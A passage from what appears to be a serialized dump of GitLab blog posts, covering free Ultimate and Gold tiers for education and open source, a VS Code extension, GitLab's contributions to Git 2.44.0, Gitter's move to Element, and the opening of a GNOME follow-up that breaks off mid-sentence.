Source","en-us/blog/gitlab-top-30-highest-velocity-open-source.yml","en-us/blog/gitlab-top-30-highest-velocity-open-source",{"_path":2687,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2688,"content":2694,"config":2699,"_id":2701,"_type":14,"title":2702,"_source":16,"_file":2703,"_stem":2704,"_extension":19},"/en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source",{"title":2689,"description":2690,"ogTitle":2689,"ogDescription":2690,"noIndex":6,"ogImage":2691,"ogUrl":2692,"ogSiteName":673,"ogType":674,"canonicalUrls":2692,"schema":2693},"GitLab Ultimate and Gold now free for education and open source","Our top-tier SaaS and self-managed offerings are now free to educational institutions and open source projects. 
Find out how to apply.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680096/Blog/Hero%20Images/open-source-education-cover.png","https://about.gitlab.com/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Ultimate and Gold now free for education and open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-05\"\n      }",{"title":2689,"description":2690,"authors":2695,"heroImage":2691,"date":2696,"body":2697,"category":10,"tags":2698},[970],"2018-06-05","\n\n**Update 2023-02-15:** This blog has been updated to remove an outdated reference to separately purchasing paid support.\nCurrent information on GitLab's Open Source benefits can be found [here](https://about.gitlab.com/solutions/open-source/).\n{: .alert .alert-warning}\n\nIt has been a [crazy 24 hours for GitLab](/blog/movingtogitlab/). More than [2,000 people tweeted about #movingtogitlab](https://twitter.com/movingtogitlab). We imported [over 100,000 repositories](https://twitter.com/gitlab/status/1004143715844124673), and we've seen a 7x increase in orders. We went [live on Bloomberg TV](https://www.youtube.com/watch?v=o7Y-aQgr8Dk&feature=youtu.be&t=30m59s). 
And on top of that, Apple announced an Xcode integration with GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Apple just announced Xcode 10 is now integrated with GitLab making it seamless and easy for iOS developers to develop new and exciting applications with just a single application for the entire lifecycle.\u003Ca href=\"https://t.co/eQbtiY4IYm\">pic.twitter.com/eQbtiY4IYm\u003C/a>\u003C/p>&mdash; GitLab (@GitLab Chatops) \u003Ca href=\"https://twitter.com/gitlab/status/1003764673454342144?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n![Github Imports Chart](https://about.gitlab.com/images/blogimages/github-imports-chart.png){: .medium.center}\n\nWe went live on YouTube on Sunday evening to answer your questions about #movingtogitlab and got a question from Mohammad Al-Ahdal who asked: \"What about Education Discounts or Student Dev Packs?\"\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/bKS6gJtTZes?start=3979\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\nToday, we're excited to announce that GitLab Ultimate and Gold are now free for educational institutions and open source projects.\n\n1. [Educational institutions application](/solutions/education/)\n1. [Open source projects application](/solutions/open-source/)\n\n## What are GitLab Ultimate and GitLab Gold?\n\n[GitLab Ultimate and Gold](/pricing/) are our most comprehensive offerings. GitLab Ultimate is self-managed, whereas GitLab Gold is our SaaS offering hosted on GitLab.com. It includes all of the features in Core, Starter, and Premium, plus a more robust set of portfolio management and security features. 
For open source and educational projects, this means unlimited access to current and new features, including [Epics](https://docs.gitlab.com/ee/user/group/epics/), [Roadmap](https://docs.gitlab.com/ee/user/group/roadmap/), [Static Application Security Testing](https://docs.gitlab.com/ee/user/application_security/sast/), [Container Scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/#doc-nav), and so much more!\n\n### Does it come with support?\n\nFree GitLab Ultimate and Gold accounts **do not** include support. Information on what's included can be found on our [open-source program page](https://about.gitlab.com/handbook/marketing/developer-relations/community-programs/opensource-program/).\n\n## Free GitLab account\n\nWhy provide a GitLab free account? We make GitLab free for education because we want students to use our most advanced features. Many universities already run GitLab. If the students use the advanced features of GitLab Ultimate and Gold they will take their experiences with these advanced features to their workplaces.\n\nWe would love to have more open source projects use GitLab. Public projects on GitLab.com already have all the features of GitLab Ultimate. And projects like [GNOME](https://www.gnome.org/news/2018/05/gnome-moves-to-gitlab-2/) and [Debian](https://salsa.debian.org/public) already run their own server with the open source version of GitLab. 
With today's announcement, open source projects that are comfortable running on proprietary software can use all the features GitLab has to offer, while allowing us to have a sustainable business model by charging non-open source organizations.\n\n",[9,930],{"slug":2700,"featured":6,"template":689},"gitlab-ultimate-and-gold-free-for-education-and-open-source","content:en-us:blog:gitlab-ultimate-and-gold-free-for-education-and-open-source.yml","Gitlab Ultimate And Gold Free For Education And Open Source","en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source.yml","en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source",{"_path":2706,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2707,"content":2713,"config":2719,"_id":2721,"_type":14,"title":2722,"_source":16,"_file":2723,"_stem":2724,"_extension":19},"/en-us/blog/gitlab-vscode-extension",{"title":2708,"description":2709,"ogTitle":2708,"ogDescription":2709,"noIndex":6,"ogImage":2710,"ogUrl":2711,"ogSiteName":673,"ogType":674,"canonicalUrls":2711,"schema":2712},"A VS Code extension for GitLab: GitLab Workflow","Senior Frontend Engineer Fatih Acet created a VS Code extension, GitLab Workflow, which allows you to do many GitLab-specific tasks quickly and easily.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680196/Blog/Hero%20Images/vs-code-extension-gitlab-workflow.jpg","https://about.gitlab.com/blog/gitlab-vscode-extension","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A VS Code extension for GitLab: GitLab Workflow\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatih Acet\"}],\n        \"datePublished\": \"2018-03-01\",\n      }",{"title":2708,"description":2709,"authors":2714,"heroImage":2710,"date":2716,"body":2717,"category":801,"tags":2718},[2715],"Fatih Acet","2018-03-01","\n\nWe recently did a survey within the Frontend team to see which tools we were using 
and how we were using them, in order to learn from one another and to build better development workflows. Through this survey, we determined that [Visual Studio Code (VS Code)](https://code.visualstudio.com/) is the most used integrated development environment (IDE) within the team. This led to the idea for a GitLab extension for VS Code that could help reduce context switching and boost productivity.\n\nUpdate: Read [eight tips for using the GitLab VS Code extension](https://about.gitlab.com/blog/vscode-workflows-for-working-with-gitlab/) and about [how GitLab + VS Code can be used for extension development](/blog/vscode-extension-development-with-gitlab/).\n{: .alert .alert-info .text-center}\n\nThis is not a [GitLab feature](/pricing/feature-comparison/) (we're actually working on building our own integrated [web IDE](https://docs.gitlab.com/ee/user/project/web_ide/)), but the extension is a quick and easy way to perform a lot of useful actions you would usually visit [GitLab.com](https://gitlab.com/) to do, directly within your VS Code editor. Watch the demo below and read on for more about how I developed the extension.\n\n## Demo\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/XcxsF0lWBhA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## First iteration of GitLab Workflow\n\nThis was my first attempt at writing a VS Code extension, and I wanted to build something simple as a first iteration. I built an extension that allowed users to see issues and merge requests assigned to them on GitLab.com. The detailed documentation and powerful APIs of VS Code enabled me to build my first version in less than two hours! 
It was an enjoyable experience.\n\n## Further iterations\n\nThis led to the creation of my second iteration: showing MR URLs, providing the pipeline status on the status bar, opening the current file and current MR on GitLab.com. I shared this second iteration with my fellow GitLab team-members on our internal Slack and received a lot of positive feedback. After that, I released new iterations and it got more than 5,000 installations in just a month. It was so well received that it was featured on the \"Trending this week\" section of Visual Studio Marketplace and is still currently being featured on the \"Trending this month\" section 🎉\n\n\u003Ccenter>\u003Cimg src=\"/images/blogimages/gitlab-vscode-extension/trending-this-month.png\" alt=\"GitLab Workflow on Visual Studio Marketplace\" style=\"width: 700px;\"/>\u003C/center>{: .shadow}\n\nThe current version of this extension allows you to:\n\n- See pipeline status, open MR and close issue links in the status bar. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#status-bar).\n- Automatically update pipeline status on the status bar so you don't need to open GitLab to see your pipeline status.\n- Advanced pipeline actions allow you to view a pipeline on GitLab, create a new pipeline, and retry or cancel current pipeline. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#pipeline-actions).\n- Issue and MR search including simple and advanced search. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#advanced-search).\n- View an MR and close an issue on GitLab with a single click from your status bar.\n- View an active file on GitLab with highlighting active line number and selected text block. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#open-active-file).\n- Create public, internal or private snippet from entire file or selection. 
[Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#create-snippet).\n- Compare your branch with master and view changes on GitLab. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#compare-with-master).\n- Validate GitLab CI configuration file `.gitlab-ci.yml`. [Read more](https://gitlab.com/fatihacet/gitlab-vscode-extension/tree/master#validate-gitlab-ci-configuration).\n\nSee below for more tasks you can perform quickly with the extension.\n\n\u003Ccenter>\u003Cimg src=\"/images/blogimages/gitlab-vscode-extension/gitlab-vscode.png\" alt=\"GitLab Workflow Commands\" style=\"width: 700px;\"/>\u003C/center>{: .shadow}\n\nYou can find the source code [here](https://gitlab.com/fatihacet/gitlab-vscode-extension) and see the extension [on the Visual Studio Marketplace](https://marketplace.visualstudio.com/items?itemName=fatihacet.gitlab-workflow). You can read the documentation [here](https://docs.gitlab.com/ee/user/project/repository/vscode.html) and check the CHANGELOG [here](https://gitlab.com/fatihacet/gitlab-vscode-extension/blob/master/CHANGELOG.md). 
There is also a [Product Hunt page](https://www.producthunt.com/posts/gitlab-workflow) for the extension.\n\nPhoto by [Iker Urteaga](https://unsplash.com/photos/TL5Vy1IM-uA?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/tools?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[1037,9,231],{"slug":2720,"featured":6,"template":689},"gitlab-vscode-extension","content:en-us:blog:gitlab-vscode-extension.yml","Gitlab Vscode Extension","en-us/blog/gitlab-vscode-extension.yml","en-us/blog/gitlab-vscode-extension",{"_path":2726,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2727,"content":2733,"config":2738,"_id":2740,"_type":14,"title":2741,"_source":16,"_file":2742,"_stem":2743,"_extension":19},"/en-us/blog/gitlabs-contributions-to-git-2-44-0",{"title":2728,"description":2729,"ogTitle":2728,"ogDescription":2729,"noIndex":6,"ogImage":2730,"ogUrl":2731,"ogSiteName":673,"ogType":674,"canonicalUrls":2731,"schema":2732},"GitLab's contributions to Git 2.44.0","Find out the topics that GitLab’s Git team – as well as the wider community – contributed to the latest Git release, including fast scripted rebases via git-replay.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666069/Blog/Hero%20Images/AdobeStock_639935439.jpg","https://about.gitlab.com/blog/gitlabs-contributions-to-git-2-44-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab's contributions to Git 2.44.0\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2024-02-26\",\n      }",{"title":2728,"description":2729,"authors":2734,"heroImage":2730,"date":2735,"body":2736,"category":10,"tags":2737},[747],"2024-02-26","The Git project recently released [Git 2.44.0](https://git-scm.com/downloads). 
In this blog post, we will highlight the contributions made by GitLab's Git team, as well as those from the wider Git community.\n\n## Fast scripted rebases via `git-replay`\n\nThe `git-rebase` command can be used to reapply a set of commits onto a different base commit. This can be quite useful when you have a feature branch where the main branch it was originally created from has advanced since creating the feature branch.\n\nIn this case, `git-rebase` can be used to reapply all commits of the feature branch onto the new commits of the main branch.\n\nSuppose you have the following commit history with the main development branch `main` and your feature branch `feature`:\n\n![main and feature branch](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678099/Blog/Content%20Images/Screenshot_2024-02-20_at_2.15.37_PM.png)\n\nYou have originally created your feature branch from `m-2`, but since then the `main` branch has gained two additional commits. Now `git-rebase` can be used to reapply your commits `f-1` and `f-2` on top of the newest commit `m-4`:\n\n![applying git-rebase](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678099/Blog/Content%20Images/Screenshot_2024-02-20_at_2.16.28_PM.png)\n\nYou can see this functionality in GitLab when you create a merge request. When you want to reapply the commits of your merge request onto new commits in the target branch, all you have to do is [to create a comment that contains the `/rebase` command](https://docs.gitlab.com/ee/topics/git/git_rebase.html#rebase-from-the-ui). The magic then happens behind the scenes.\n\nThere is one problem though: `git-rebase` only works on repositories that have a worktree (a directory where a branch, tag or commit has been checked out). The repositories we host at GitLab are “bare” repositories, which don’t have a worktree. This means that the files and directories tracked by your commits are only tracked as Git objects in the `.git` directory of the repository. 
This is mostly done to save precious disk space and speed up operations.\n\nIn the past, we used [libgit2](https://libgit2.org/) to implement rebases. But for various reasons, we decided to remove this dependency in favor of only using Git commands to access Git repositories. But this created a problem for\nus because we could neither use libgit2 nor `git-rebase` to perform rebases. While we could create an ad-hoc worktree to use `git-rebase`, this would have been prohibitively expensive in large monorepos.\n\nLuckily, [Elijah Newren](https://www.linkedin.com/in/elijah-newren-0a41665/) has upstreamed a new merge algorithm called `merge-ort` in Git 2.33. Despite being significantly faster than the old `recursive` merge strategy in almost all cases, it also has the added benefit that it can perform merges in-memory. In practice, this also allows us to perform such rebases in-memory.\n\nEnter `git-replay`, which is a new command that does essentially the same thing as `git-rebase` but in-memory, thus not requiring a worktree anymore. This is an\nimportant building block to allow us to develop faster rebasing of merge requests in the future.\n\nYou may ask: Why a new command instead of updating `git-rebase`? The problem here was that `git-rebase` is essentially a user-focused command (also called a\n\"porcelain\" command in Git). Thus it performs several actions that are not required by a script at all, like, for example, executing hooks or checking out files into the worktree. The new `git-replay` command is a script-focused\ncommand (also called a \"plumbing\" command in Git) and has a different set of advantages and drawbacks. 
Furthermore, besides doing rebases, we plan to use it to do cherry-picks and reverts in the future, too.\n\nThis topic was a joint effort by [Elijah Newren](https://www.linkedin.com/in/elijah-newren-0a41665/) and\n[Christian Couder](https://www.gitlab.com/chriscool).\n\n## Commit-graph object existence checks\n\nYou may know that each commit can have an arbitrary number of parents:\n\n- The first commit in your repository has no parents. This is the \"root\" commit.\n- Normal commits have a single parent.\n- Merge commits have at least two, but sometimes even more than two parents.\n\nThis parent relationship is part of what forms the basis of Git's object model and establishes the object graph. If you want to traverse this object graph, Git must look up an entry point commit and from there walk the parent chain of commits.\n\nTo fully traverse history from the newest to the oldest commit, you must look up and parse all commit objects in between. Because repositories can consist of hundreds of thousands or even millions of such commits, this can be\nquite an expensive operation. But users of such repositories still want to be able to, for example, search for a specific commit that changes a specific file\nwithout waiting several minutes for the search to complete.\n\nThe Git project introduced a commit-graph data structure a long time ago that essentially caches a lot of the parsed information in a more accessible data structure. This commit-graph encodes the parent-child relation and some additional information, like, for example, a [bloom filter](https://en.wikipedia.org/wiki/Bloom_filter) of changed\nfiles.\n\nThis commit-graph is usually updated automatically during repository housekeeping. Because housekeeping only runs every so often, the commit-graph can be missing entries for recently added commits. 
This is perfectly fine and expected to happen, and Git knows to instead look up and parse the commit object in such a case.\n\nNow, the reverse case also theoretically exists: The commit-graph contains cached information of an object that does not exist anymore because it has been deleted without regenerating the commit-graph. The consequence would\nbe that lookups of this commit succeed even though they really shouldn't. To avoid this, in Git 2.43.0, we upstreamed a change into Git that detects commits\nthat exist in the commit-graph but no longer in the object database.\n\nThis change requires us to do an existence check for every commit that we parse via the commit-graph. Naturally, this change leads to a performance regression, which was measured to be about 30% in the worst case. This was\ndeemed acceptable though, because it is better to return the correct result slowly than to return the wrong result quickly. Furthermore, the commit-graph still results in a significant performance improvement compared to not using the commit-graph at all. To give users an escape hatch in case they do not want this performance regression, we also introduced a `GIT_COMMIT_GRAPH_PARANOIA` environment variable that can be used to disable this check.\n\nAfter this change was merged and released though, we heard of cases where the impact was even worse than 30%: counting the number of commits via `git rev-list --count` in the Linux repository regressed by about 100%. After some\ndiscussion upstream, we changed the default so that we no longer verify commit existence for the commit-graph to speed up such queries again. 
Because repository housekeeping should ensure that commit-graphs are consistent, this change should stop us from needlessly pessimizing this uncommon case.\n\nThis change was implemented by\n[Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Making Git ready for a new ref backend\n\nA common theme among our customers is that large monorepos with many refs create significant performance problems with many workloads. The range of problems here are manyfold, but the more refs a repository has, the more pronounced the problems become.\n\nMany of the issues are inherent limitations of the way Git stores refs. The so-called `files` ref backend uses a combination of two mechanisms:\n- \"Loose refs\" are simple files that contain the object ID they point to.\n- \"Packed refs\" are a single file that contains a collection of refs.\n\nWhenever you update or create a ref, Git creates them as a loose ref. Every once in a while, repository housekeeping then compresses all loose refs into the `packed-refs` file and deletes the corresponding loose refs. 
A typical repo looks as follows:\n\n```shell\n $ git init --ref-format=files repo\nInitialized empty Git repository in /tmp/repo/.git/\n $ cd repo/\n $ git commit --allow-empty --message \"initial commit\"\n $ tree .git/\n.git/\n├── config\n├── HEAD\n├── index\n└── refs\n\t├── heads\n\t│   └── main\n\t└── tags\n $ cat .git/HEAD\nref: refs/heads/main\n $ cat .git/refs/heads/main\nbf1814060ed3a88bd457ac4dca055d000ffe4482\n\n $ git pack-refs --all\n $ cat .git/packed-refs\n# pack-refs with: peeled fully-peeled sorted\nbf1814060ed3a88bd457ac4dca055d000ffe4482 refs/heads/main\n```\n\nWhile this model has served the Git project quite well, relying on a filesystem like this has several limitations:\n- Deleting a single ref requires you to rewrite the `packed-refs` file, which can be gigabytes in size.\n- It is impossible to do atomic reads because you cannot atomically scan multiple files at once when a concurrent writer may modify some refs.\n- It is impossible to do atomic writes because creating or updating several refs requires you to write to several files.\n- Housekeeping via `git-pack-refs` does not scale well because of its all-into-one repacking nature.\n- The storage format of both loose and packed refs is inefficient and wastes disk space.\n- Filesystem-specific behavior can be weird and may restrict which refs can be created. For example, Case-insensitivity on filesystems like FAT32 can cause issues, when trying to create two refs with the same name that only differ in their case.\n\nSeveral years ago, [Shawn Pearce](https://sfconservancy.org/blog/2018/jan/30/shawn-pearce/) had proposed the \"reftable\" format as an alternative new format to store refs in a repository. 
This new format was supposed to help with most or all of the above issues and is essentially a\nbinary format specifically catered towards storing references in Git.\n\nThis new \"reftable\" format has already been implemented by\n[JGit](https://www.eclipse.org/jgit/) and is used extensively by the [Gerrit project](https://www.gerritcodereview.com/). And, in 2021, [Han-Wen Nienhuys](https://www.linkedin.com/pub/dir/han-wen/nienhuys) upstreamed a library to read and write reftables into the Git project. What is still missing though is the backend that ties together the reftable library and\nGit, and unfortunately progress has stalled here. As we experience much of the pain that the reftable format is supposed to address, we decided to take over the work from Han-Wen and continue the upstreaming process.\n\nBefore we can upstream the reftable backend itself though, we first had to prepare several parts of Git for such a new backend. While the Git project already has a concept of different ref backends, the boundaries were very blurry because until now there only exists a single \"files\" backend.\n\nThe biggest contribution by GitLab in this release was thus a joint effort to prepare all the parts of Git for the new backend that were crossing boundaries:\n- Some commands used to read or write refs directly via the filesystem without going through the ref backend.\n- The ref databases of worktrees created via `git-worktree` were initialized ad-hoc instead of going through the ref backend.\n- Cloning a repository created the ref database with the wrong object format when using SHA256. This did not matter with the \"files\" backend because the format was not stored anywhere by the ref backend itself. 
But because the reftable backend encodes the format into its binary format, this was a problem.\n- Many tests read or write refs via the filesystem directly.\n- We invested quite some time already into bug fixing and performance optimizations for the reftable library itself.\n- We introduced a new `refStorage` extension that tells Git in which format the repository stores its refs. This can be changed when creating a new repository by specifying `--ref-format` flag in `git-init` or `git-clone`. For now, only the “files” format is supported.\n\nThe overarching goal was to get the work-in-progress reftable backend into a state where it passes the complete test suite. And even though the reftable backend is not yet part of Git 2.44.0, I am happy to report that we have\nsucceeded in this goal: Overall, we have contributed more than 150 patches to realize it. Given the current state, we expect that the new reftable backend will become available with Git v2.45.0.\n\nWe will not cover the new reftable format in this post because it is out of scope, but stay tuned for more details soon!\n\nThis project was a joint effort by\n[John Cai](https://gitlab.com/jcaigitlab),\n[Justin Tobler](https://gitlab.com/justintobler),\n[Karthik Nayak](https://gitlab.com/knayakgl),\n[Stan Hu](https://gitlab.com/stanhu),\n[Toon Claes](https://gitlab.com/toon),\nand [Patrick Steinhardt](https://gitlab.com/pks-gitlab), who has led the effort. Credit also goes to\n[Shawn Pearce](https://sfconservancy.org/blog/2018/jan/30/shawn-pearce/) as original inventor of the format and [Han-Wen Nienhuys](https://www.linkedin.com/pub/dir/han-wen/nienhuys) as the\nauthor of the reftable library.\n\n## Support for GitLab CI\n\nAs all the preparations for the new `reftable` backend demonstrate, we have significantly increased our investments into the long-term vision and health of\nthe Git project. 
And because a very important part of our product depends on the Git project to remain healthy, we want to continue investing into the Git project like this.\n\nFor us, this means that it was high time to improve our own workflows in the context of the Git project. Naturally, we were already using GitLab CI as part of the process instead of the GitHub Workflows support that existed in\nthe Git project. But we were using a [`.gitlab-ci.yml` definition](https://docs.gitlab.com/ee/ci/yaml/) that was not part of the upstream repository and instead maintained outside the Git project.\n\nWhile this worked reasonably well, there were two significant downsides:\n- Test coverage was significantly lower than that of the GitHub Workflows definition. Notably, we did not test on macOS, had no static analysis, and didn't test with non-default settings. This often led to failures in the GitHub Workflows pipeline that we could have detected earlier if we had better CI integration.\n- Other potential contributors to Git who may already be using GitLab on a daily basis didn't have easy access to a GitLab CI pipeline.\n\nTherefore, we decided to upstream a new GitLab CI definition that integrates with the preexisting CI infrastructure that the Git project already had. 
Because we reuse a lot of pre-existing infrastructure, this ensures that both GitLab CI and GitHub Workflows run tests mostly in the same way.\n\nAnother benefit of GitLab CI support is that, for the first time, we now also exercise an architecture other than `x86_64` or `i686`: the [macOS runners we provide at GitLab.com](https://docs.gitlab.com/ee/ci/runners/saas/macos_saas_runner.html) use an Apple M1, which is based on the `arm64` architecture.\n\nThis change was contributed by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## More to come\n\nThis blog post gives just a glimpse into what has happened in the Git project, which lies at the heart of [source code management](https://about.gitlab.com/solutions/source-code-management/) at GitLab. Stay tuned for more insights into future contributions and the reftable backend in particular!",[751,9,1036],{"slug":2739,"featured":6,"template":689},"gitlabs-contributions-to-git-2-44-0","content:en-us:blog:gitlabs-contributions-to-git-2-44-0.yml","Gitlabs Contributions To Git 2 44 0","en-us/blog/gitlabs-contributions-to-git-2-44-0.yml","en-us/blog/gitlabs-contributions-to-git-2-44-0",{"_path":2745,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2746,"content":2751,"config":2757,"_id":2759,"_type":14,"title":2760,"_source":16,"_file":2761,"_stem":2762,"_extension":19},"/en-us/blog/gitter-moves-to-element",{"title":2747,"description":2748,"ogTitle":2747,"ogDescription":2748,"noIndex":6,"ogImage":1211,"ogUrl":2749,"ogSiteName":673,"ogType":674,"canonicalUrls":2749,"schema":2750},"Gitter lands new home in Matrix with Element","Gitter’s new owner Element will continue to support and invest in the service and user communities.","https://about.gitlab.com/blog/gitter-moves-to-element","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Gitter lands new home in Matrix with Element\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Eliran Mesika\"}],\n        \"datePublished\": \"2020-09-30\",\n      }",{"title":2747,"description":2748,"authors":2752,"heroImage":1211,"date":2754,"body":2755,"category":930,"tags":2756},[2753],"Eliran Mesika","2020-09-30","\n\nGitter, the open source [chat and networking platform](/blog/gitter-acquisition/), has been sold to secure chat application company [Element](https://element.io) which will continue to support and invest in the service and the user communities going forward.\n\nAs many of you are aware, GitLab has been focused this year on driving efficiency with a goal of extending our depth in our core product categories. That focus led us to look for a buyer for Gitter that could increase investment required to serve developers. With Element’s acquisition of Gitter, GitLab has more bandwidth to devote to our core business and Gitter will continue to have opportunities to thrive. \n\n“A great project chat is an essential element of most open source projects and Gitter is the leading open source solution,” says [Sid Sijbrandij](/company/team/#sytses), CEO, GitLab. “Under GitLab, Gitter’s community has grown to 1.7M users who have also contributed to improving the product for everyone. We are happy that Gitter will now have a fantastic home with Element. They have the momentum to quickly build on the success of Gitter to expand its footprint within the developer community and act as a driver for the rest of its business and the Matrix ecosystem. It’s a great home for Gitter.”\n\nElement is the company behind [Matrix](https://matrix.org), the open network for secure and decentralized communication with more than 20 million users. \n\n“It’s a privilege to have Gitter join Element,” says Matthew Hodgson, CEO and CTO at Element. 
“Gitter is the only chat platform focusing exclusively on developers, and we cannot wait to extend its reach to the entirety of the open Matrix network - confirming Matrix as an ideal home for open collaboration between software developers.”\n\nFounded in 2014, Gitter has operated as a standalone product, independent of GitLab, since 2017. Gitter is unique in its developer focus –  the tagline is “Where developers come to talk.” Used by large communities including [Node](https://gitter.im/nodejs/home), [TypeScript](https://gitter.im/Microsoft/TypeScript), [Angular](https://gitter.im/angular/home) and [Scala](https://gitter.im/scala/home), Gitter’s service is free, open source and has no commercial edition. A complete, indexed message history and robust integration [API](https://developer.gitter.im/docs/welcome) makes Gitter a perfect platform for managing communities around open-source projects. Gitter is available on the web with clients available for Mac, Windows, Linux, iOS, and Android.\n\n## Going forward\n\n[Element plans](https://element.io/blog/gitter-is-joining-element) to build out native Matrix connectivity, replacing the [matrix-appservice-gitter](https://github.com/matrix-org/matrix-appservice-gitter) bridge running since 2016. 
Over time, Gitter will effectively become a Matrix client.\n\nGet more details on this transition on the [Changelog podcast](https://cdn.changelog.com/uploads/podcast/414/the-changelog-414.mp3).\n\nMatrix has a [detailed Gitter transition plan](https://matrix.org/blog/welcoming-gitter-to-matrix) and welcomes [feedback on the process](https://matrix.to/#/#gitter:matrix.org).\n",[267,9,803],{"slug":2758,"featured":6,"template":689},"gitter-moves-to-element","content:en-us:blog:gitter-moves-to-element.yml","Gitter Moves To Element","en-us/blog/gitter-moves-to-element.yml","en-us/blog/gitter-moves-to-element",{"_path":2764,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2765,"content":2771,"config":2777,"_id":2779,"_type":14,"title":2780,"_source":16,"_file":2781,"_stem":2782,"_extension":19},"/en-us/blog/gnome-follow-up",{"title":2766,"description":2767,"ogTitle":2766,"ogDescription":2767,"noIndex":6,"ogImage":2768,"ogUrl":2769,"ogSiteName":673,"ogType":674,"canonicalUrls":2769,"schema":2770},"GNOME: two years after the move to GitLab","Extensive CI/CD adoption and easier contributions are just a couple of the benefits of #movingtogitlab for GNOME.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671276/Blog/Hero%20Images/gitlab-gnome.png","https://about.gitlab.com/blog/gnome-follow-up","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GNOME: two years after the move to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"}],\n        \"datePublished\": \"2020-09-08\",\n      }",{"title":2766,"description":2767,"authors":2772,"heroImage":2768,"date":2774,"body":2775,"category":10,"tags":2776},[2773],"Nuritzi Sanchez","2020-09-08","\n\n_It's been a little over two years since the [GNOME project moved to GitLab](/blog/welcome-gnome-to-gitlab/). 
We wanted to check in to see what’s happening at GNOME these days and see if they had noticed an impact from their migration on their community and their software development lifecycle. To find out the latest, we spoke with [Carlos Soriano](https://www.linkedin.com/in/carlos-soriano-sanchez-4b361240/) and [Sri Ramkrishna](https://www.linkedin.com/in/sriram-ramkrishna/) from GNOME and combined their responses._ \n\n### How are you using GitLab at GNOME? \n\nGNOME is using GitLab’s [Community Edition](/install/ce-or-ee/), which is entirely open source.\n\nAll teams at GNOME have been using GitLab for over a year, including non-coding teams like engagement and design, and the board of directors. The GNOME Foundation’s staff is also using GitLab for things like grant writing and running the foundation. \n\nGNOME is using most features that GitLab has to offer, such as [CI/CD](/topics/ci-cd/) for testing, issue tracking, kanban boards, and labels. Labels and CI/CD are two of the most important features being used across the entire organization. \n\nIn addition to this, GNOME is using GitLab Pages for some of the landing pages for projects, and also to host documentation.\n\nThe only team that hasn’t fully been able to use GitLab is the GNOME translation team since they need a different set of permissions and roles than GitLab provides. For them, Bugzilla was more flexible, and so some of their workflow is still there and in other tools. However, they are using GitLab for issue tracking and coordination. \n\nHere's how [GNOME has set up its GitLab instance](https://gitlab.gnome.org/explore/groups).\n\n### What are some of the changes that you’ve noticed in your community? \n\nThe perception at GNOME is that the move to GitLab has made it easier for people to contribute to GNOME. 
\n\nOne noticeable difference is that a lot of people are now using the GNOME GitLab instance to host their own projects that are somehow related to GNOME but aren’t part of the core software produced by GNOME. This has increased GNOME’s developer community. \n \nAnother noticeable difference in the community is that, since moving to GitLab, there is more awareness around what CI/CD is and how important it is to the development process. CI/CD is being used extensively throughout the project. \n\nThere is now also more transparency at GNOME, which is both a blessing and a curse. More people from the wider community are able to see what’s happening in the development cycle, and are chiming in on issues and merge requests.  This has caused friction at times when things like designs were picked up by the wider community that weren’t ready for comments. \n\nUnfortunately, GNOME does not currently have metrics to share about the changes they’ve seen within their community; however, the overall sentiment has been positive towards the move to GitLab. GNOME is on the path to being a more data-driven organization than it has been in the past, and hopes to share more concrete data in the future. \n\n### What are some of the changes in GNOME’s software development lifecycle?\n\nThe biggest change in GNOME's software development lifecycle is that they can now build images for testing pipelines, something that couldn't be done before moving to GitLab. In the future, they hope to allow people to preview upcoming releases. \n\nDespite the positive changes in testing 